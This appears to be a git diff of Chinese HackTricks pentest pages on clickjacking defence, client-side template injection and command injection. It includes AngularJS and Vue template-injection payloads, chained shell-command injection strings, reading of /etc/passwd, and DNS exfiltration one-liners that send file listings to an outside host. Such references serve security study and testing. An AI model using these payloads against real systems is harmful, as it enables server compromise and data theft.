* 检测并警告用户可能的点击劫持尝试。
* 防止对不可见框架的点击。
* 检测并警告用户潜在的点击劫持尝试。
然而,这些破坏框架的脚本可能会被规避:
然而,这些框架破坏脚本可能会被规避:
* **浏览器的安全设置:** 一些浏览器可能会基于其安全设置或缺乏 JavaScript 支持来阻止这些脚本。
* **HTML5 iframe `sandbox` 属性:** 攻击者可以通过设置 `sandbox` 属性为 `allow-forms``allow-scripts` 值而不包括 `allow-top-navigation` 来中和破坏框架脚本。这会阻止 iframe 验证是否为顶级窗口,例如,
* **浏览器的安全设置:** 一些浏览器可能会根据其安全设置或缺乏JavaScript支持来阻止这些脚本。
* **HTML5 iframe `sandbox` 属性:** 攻击者可以通过设置`sandbox`属性为`allow-forms`或`allow-scripts`值而不包含`allow-top-navigation`来中和框架破坏脚本。这会阻止iframe验证它是否是顶层窗口,例如,
```html
<iframe id="victim_website" src="https://victim-website.com" sandbox="allow-forms allow-scripts"></iframe>
```
The `allow-forms``allow-scripts` 值在禁用顶级导航的同时启用 iframe 内的操作。为了确保目标站点的预期功能,可能需要额外的权限,如 `allow-same-origin``allow-modals`,具体取决于攻击类型。浏览器控制台消息可以指导允许哪些权限。
### 服务器端防御
#### X-Frame-Options
**`X-Frame-Options` HTTP响应头** 通知浏览器关在 `<frame>``<iframe>`呈现页面的合法性,有助于防止点击劫持
**`X-Frame-Options` HTTP 响应头** 通知浏览器关`<frame>``<iframe>`渲染页面的合法性,有助于防止 Clickjacking
- `X-Frame-Options: deny` - 没有域可以嵌入内容。
- `X-Frame-Options: sameorigin` - 只有当前站点可以嵌入内容。
- `X-Frame-Options: allow-from https://trusted.com` - 只有指定的 'uri' 可以嵌入页面。
- 请注意限制如果浏览器不支持此指令则可能无效。一些浏览器更喜欢CSP frame-ancestors指令。
* `X-Frame-Options: deny` - 没有域可以框架内容。
* `X-Frame-Options: sameorigin` - 只有当前站点可以框架内容。
* `X-Frame-Options: allow-from https://trusted.com` - 只有指定的 'uri' 可以框架页面。
* 注意限制:如果浏览器不支持此指令,可能无法工作。一些浏览器更倾向于 CSP frame-ancestors 指令。
#### 内容安全策略CSPframe-ancestors指令
#### 内容安全策略 (CSP) frame-ancestors 指令
**CSP中的`frame-ancestors`指令** 是防止点击劫持的建议方法:
**CSP 中的 `frame-ancestors` 指令** 是防止 Clickjacking 的建议方法:
- `frame-ancestors 'none'` - 类似于 `X-Frame-Options: deny`
- `frame-ancestors 'self'` - 类似于 `X-Frame-Options: sameorigin`
- `frame-ancestors trusted.com` - 类似于 `X-Frame-Options: allow-from`
* `frame-ancestors 'none'` - 类似于 `X-Frame-Options: deny`
* `frame-ancestors 'self'` - 类似于 `X-Frame-Options: sameorigin`
* `frame-ancestors trusted.com` - 类似于 `X-Frame-Options: allow-from`
例如,以下CSP仅允许来自相同域的嵌入
例如,以下 CSP 仅允许来自同一域的框架
`Content-Security-Policy: frame-ancestors 'self';`
有关更多详细信息和复杂示例,请参阅[frame-ancestors CSP文档](https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors)和[Mozilla的CSP frame-ancestors文档](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors)。
更多详细信息和复杂示例可以在 [frame-ancestors CSP 文档](https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors) [Mozilla CSP frame-ancestors 文档](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors) 中找到
### 使用`child-src`和`frame-src`的内容安全策略CSP
### 内容安全策略 (CSP) 与 `child-src``frame-src`
**内容安全策略CSP** 是一项安全措施,通过指定浏览器应允许加载内容的来源,有助于防止点击劫持和其他代码注入攻击。
**内容安全策略 (CSP)** 是一种安全措施,通过指定浏览器应允许加载内容的来源,帮助防止 Clickjacking 和其他代码注入攻击。
#### `frame-src`指令
#### `frame-src` 指令
- 定义帧的有效来源。
- 比`default-src`指令更具体。
* 定义框架的有效来源。
* 比 `default-src` 指令更具体。
```
Content-Security-Policy: frame-src 'self' https://trusted-website.com;
```
这个策略允许来自相同源self和 https://trusted-website.com 的框架。
策略允许来自相同源self和 https://trusted-website.com 的框架。
#### `child-src` 指令
* 在 CSP 2 级中引入,用于设置 Web Workers 和框架的有效来源。
* 在 CSP 级别 2 中引入,用于设置 web workers 和框架的有效来源。
* 作为 frame-src 和 worker-src 的后备。
```
Content-Security-Policy: child-src 'self' https://trusted-website.com;
```
这个策略允许来自相同源self和 https://trusted-website.com 的框架和 worker
此策略允许来自相同来源self和 https://trusted-website.com 的框架和工作者
**使用注意事项:**
**使用说明:**
* 弃用: child-src 正在逐步被 frame-src 和 worker-src 取代。
* 回退行为: 如果 frame-src 不存在,则 frames 的回退选项是 child-src。如果两者都不存在,则使用 default-src。
* 严格的源定义: 在指令中只包含可信任的源,以防止被利用。
* 废弃:child-src 正在逐步被 frame-src 和 worker-src 取代。
* 回退行为:如果 frame-src 缺失,则使用 child-src 作为框架的回退。如果两者都缺失,则使用 default-src。
* 严格的源定义:在指令中仅包含受信任的源以防止利用。
#### JavaScript 打破框架的脚本
#### JavaScript 框架破坏脚本
尽管不是完全可靠,基于 JavaScript 的打破框架脚本可用于防止网页被嵌套。示例:
尽管并非完全可靠,但基于 JavaScript 的框架破坏脚本可以用于防止网页被框架化。示例:
```javascript
if (top !== self) {
top.location = self.location;
}
```
#### 使用反CSRF令牌
#### 使用反-CSRF令牌
* **令牌验证:** 在Web应用程序中使用反CSRF令牌以确保状态更改请求是由用户有意进行的而不是通过Clickjacked页面
* **令牌验证:** 在Web应用程序中使用反-CSRF令牌以确保状态更改请求是用户有意发出的而不是通过Clickjacked页面发出的
## 参考资料
## 参考文献
* [**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)
* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html)
@ -205,21 +208,22 @@ top.location = self.location;
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking) 可以轻松构建并通过世界上最先进的社区工具**自动化工作流程**。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=clickjacking" %}
{% hint style="success" %}
学习和实践AWS黑客攻击<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客攻击 <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,28 +1,29 @@
# 客户端模板注入CSTI
# 客户端模板注入 (CSTI)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
#### [WhiteIntel](https://whiteintel.io)
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以在以下网址检查他们的网站并尝试他们的引擎,**免费**使用
您可以访问他们的网站并免费尝试他们的引擎
{% embed url="https://whiteintel.io" %}
@ -30,15 +31,15 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
## 摘要
类似于[**服务器端模板注入**](ssti-server-side-template-injection/),但是发生在**客户端**。**SSTI**可以让您在远程服务器上**执行代码**,而**CSTI**可以让您在受害者的浏览器中**执行任意JavaScript**代码。
就像 [**服务器端模板注入**](ssti-server-side-template-injection/) 但在 **客户端****SSTI** 允许您在远程服务器上 **执行代码**,而 **CSTI** 可能允许您在受害者的浏览器中 **执行任意 JavaScript** 代码。
对于这种漏洞的**测试**与**SSTI**的情况非常**相似**,解释器期望**一个模板**并将其执行。例如,使用像 `{{ 7-7 }}` 这样的有效负载,如果应用程序**存在漏洞**,您将看到一个 `0`,如果没有,您将看到原始内容: `{{ 7-7 }}`
**测试** 这种漏洞 **SSTI** 的情况非常 **相似**,解释器期望 **一个模板** 并将其执行。例如,使用像 `{{ 7-7 }}` 的有效载荷,如果应用程序是 **脆弱的**,您将看到 `0`,如果不是,您将看到原始内容:`{{ 7-7 }}`
## AngularJS
AngularJS是一个广泛使用的JavaScript框架通过称为指令的属性与HTML进行交互其中一个著名的指令是**`ng-app`**。该指令允许AngularJS处理HTML内容从而使JavaScript表达式在双大括号内执行
AngularJS 是一个广泛使用的 JavaScript 框架,通过称为指令的属性与 HTML 交互,其中一个显著的指令是 **`ng-app`**。该指令允许 AngularJS 处理 HTML 内容,从而在双大括号内执行 JavaScript 表达式
在用户输入动态插入到标记为`ng-app`的HTML主体中的情况下可以执行任意JavaScript代码。这可以通过利用输入中的AngularJS语法来实现。以下是演示如何执行JavaScript代码的示例:
在用户输入动态插入到标记为 `ng-app` 的 HTML 主体的场景中,可以执行任意 JavaScript 代码。这可以通过利用 AngularJS 的语法在输入中实现。以下是演示如何执行 JavaScript 代码的示例:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
@ -47,29 +48,29 @@ AngularJS是一个广泛使用的JavaScript框架通过称为指令的属性
<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
您可以在[http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)和[**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)找到**AngularJS**中漏洞的非常**基本的在线示例**。
您可以在 **AngularJS** 中找到一个非常 **基本的在线示例**,该漏洞位于 [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)
{% hint style="danger" %}
[**Angular 1.6移除了沙盒**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html),因此从这个版本开始,像`{{constructor.constructor('alert(1)')()}}`或`<input ng-focus=$event.view.alert('XSS')>`这样的有效载荷应该可以使用
[**Angular 1.6 移除了沙箱**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html),因此从这个版本开始,像 `{{constructor.constructor('alert(1)')()}}``<input ng-focus=$event.view.alert('XSS')>` 的有效载荷应该可以工作
{% endhint %}
## VueJS
您可以在[https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)找到一个**易受攻击的Vue**实现\
有效载荷[`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
您可以在 [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh) 找到一个 **易受攻击的 Vue** 实现\
有效载荷: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
以及这里易受攻击示例的**源代码**[https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
易受攻击示例的 **源代码** 在这里: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
```markup
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
### **V3**
在 VUE 中关于 CSTI 的一篇非常好的文章可以在 [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets) 找到
在[https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)中可以找到关于VUE中CSTI的非常好的文章。
### **V3**
```
{{_openBlock.constructor('alert(1)')()}}
```
Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
致谢: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
### **V2**
```
@ -77,7 +78,7 @@ Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/resea
```
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
**在** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected) **中查看更多VUE有效载荷**
**查看更多 VUE 有效载荷在** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)
## Mavo
@ -95,9 +96,9 @@ javascript:alert(1)%252f%252f..%252fcss-images
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
```
**更多有效载荷请查看** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
**更多有效载荷请** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
## **暴力检测列表**
## **暴力破解检测列表**
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
@ -105,24 +106,25 @@ javascript:alert(1)%252f%252f..%252fcss-images
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,33 +1,36 @@
# 命令注入
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
## 什么是命令注入?
**命令注入**允许攻击者在托管应用程序的服务器上执行任意操作系统命令。因此,应用程序及其所有数据可能会被完全破坏。通常,执行这些命令允许攻击者未经授权地访问或控制应用程序环境和底层系统
**命令注入** 允许攻击者在托管应用程序的服务器上执行任意操作系统命令。因此,应用程序及其所有数据可能会完全被破坏。这些命令的执行通常允许攻击者获得对应用程序环境和底层系统的未经授权的访问或控制
### 上下文
根据**您的输入被注入的位置**,您可能需要在命令之前**终止引用的上下文**(使用`"`或`'`)。
根据 **输入被注入的位置**,您可能需要在命令之前 **终止引用上下文**(使用 `"``'`)。
## 命令注入/执行
```bash
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
@ -46,9 +49,9 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
```
### **限制**绕过
### **限制** 绕过
如果您正在尝试在**Linux机器内执行任意命令**,您可能会对阅读有关此**绕过**感兴趣:
如果您试图在 **linux 机器内部执行任意命令**,您会对以下 **绕过** 感兴趣:
{% content-ref url="../linux-hardening/bypass-bash-restrictions/" %}
[bypass-bash-restrictions](../linux-hardening/bypass-bash-restrictions/)
@ -62,7 +65,7 @@ vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod
```
### 参数
以下是可能容易受到代码注入和类似远程代码执行漏洞影响的前 25 个参数(来自[链接](https://twitter.com/trbughunters/status/1283133356922884096):
以下是可能容易受到代码注入和类似RCE漏洞的前25个参数来自 [link](https://twitter.com/trbughunters/status/1283133356922884096)
```
?cmd={payload}
?exec={payload}
@ -90,9 +93,9 @@ vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod
?run={payload}
?print={payload}
```
### 基于时间的数据泄
### 基于时间的数据
提取数据:逐个字符
逐字符提取数据:
```
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
@ -104,9 +107,9 @@ real 0m0.002s
user 0m0.000s
sys 0m0.000s
```
### 基于 DNS 的数据渗透
### 基于DNS的数据外泄
基于来自 `https://github.com/HoLyVieR/dnsbin` 的工具,也托管在 dnsbin.zhack.ca
基于工具 `https://github.com/HoLyVieR/dnsbin`,也托管在 dnsbin.zhack.ca
```
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
@ -116,7 +119,12 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
```
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```
### 过滤器绕过
在线工具检查基于DNS的数据外泄
* dnsbin.zhack.ca
* pingb.in
### 过滤绕过
#### Windows
```
@ -129,33 +137,34 @@ powershell C:**2\n??e*d.*? # notepad
[bypass-bash-restrictions](../linux-hardening/bypass-bash-restrictions/)
{% endcontent-ref %}
## Brute-Force Detection List
## 暴力破解检测列表
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}
## References
## 参考文献
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
* [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection)轻松构建和**自动化工作流程**,利用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}

View file

@ -1,39 +1,40 @@
# 内容安全策略CSP绕过
# 内容安全策略 (CSP) 绕过
{% hint style="success" %}
